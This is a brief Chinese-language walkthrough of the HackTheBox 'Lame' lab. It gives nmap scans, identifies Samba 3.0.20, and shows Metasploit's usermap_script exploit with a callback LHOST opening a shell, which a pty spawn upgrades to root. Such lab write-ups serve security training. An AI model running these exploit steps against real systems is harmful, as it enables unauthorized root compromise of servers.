- 难度 : Easy
- 靶场 : HackTheBox [Lame]
- 类型 : 综合渗透
GetShell
nmap 10.10.10.3 -sT -Pn --top-ports 1000
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds
扫描端口,发现开放了上面这些端口,跟着题目走发现 vsftpd 2.3.4
有个笑脸后面漏洞,不过没法利用。
使用 nmap
进一步扫描 Samba 服务。
nmap 10.10.10.3 -sT -sV -Pn -p 139,445 --script smb-os-discovery
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Host script results:
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: lame
| NetBIOS computer name:
| Domain name: hackthebox.gr
| FQDN: lame.hackthebox.gr
|_ System time: 2025-05-07T04:36:46-04:00
找到版本号 3.0.20
等信息。
用 MSF 搜一下漏洞。
msfconsole
search Samba 3.0.20
use multi/samba/usermap_script
set RHOSTS 10.10.10.3
set LHOST 10.10.14.45
发现利用成功,使用 python
进入 shell 。
python -c 'import pty;pty.spawn("/bin/bash")'
发现已经是 root 用户,成功拿到 flag。
评论